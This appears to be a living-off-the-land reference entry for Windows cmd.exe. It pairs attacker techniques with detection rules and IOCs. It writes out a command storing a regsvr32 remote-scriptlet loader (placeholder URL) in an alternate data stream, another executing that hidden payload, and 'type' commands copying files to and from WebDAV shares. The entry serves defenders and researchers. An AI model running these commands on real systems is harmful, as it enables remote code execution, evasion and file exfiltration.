Cmd.exe

The command-line interpreter in Windows

Paths

• C:\Windows\System32\cmd.exe
• C:\Windows\SysWOW64\cmd.exe

Commands

ADS

Add content to an Alternate Data Stream (ADS).

Use case: Can be used to evade defensive countermeasures or to hide as a persistence mechanism

Privileges: User

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat

ADS

Execute payload.bat stored in an Alternate Data Stream (ADS).

Use case: Can be used to evade defensive countermeasures or to hide as a persistence mechanism

Privileges: User

cmd.exe - < {PATH}:payload.bat

Download

Downloads a specified file from a WebDAV server to the target file.

Use case: Download/copy a file from a WebDAV server

Privileges: User

type {PATH_SMB} > {PATH_ABSOLUTE}

Upload

Uploads a specified file to a WebDAV server.

Use case: Upload a file to a WebDAV server

Privileges: User

type {PATH_ABSOLUTE} > {PATH_SMB}

Detection

• Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
• Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
• Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
• IOC: cmd.exe executing files from alternate data streams.
• IOC: cmd.exe creating/modifying file contents in an alternate data stream.

Resources

• https://twitter.com/yeyint_mth/status/1143824979139579904
• https://twitter.com/Mr_0rng/status/1601408154780446721
• https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
• https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type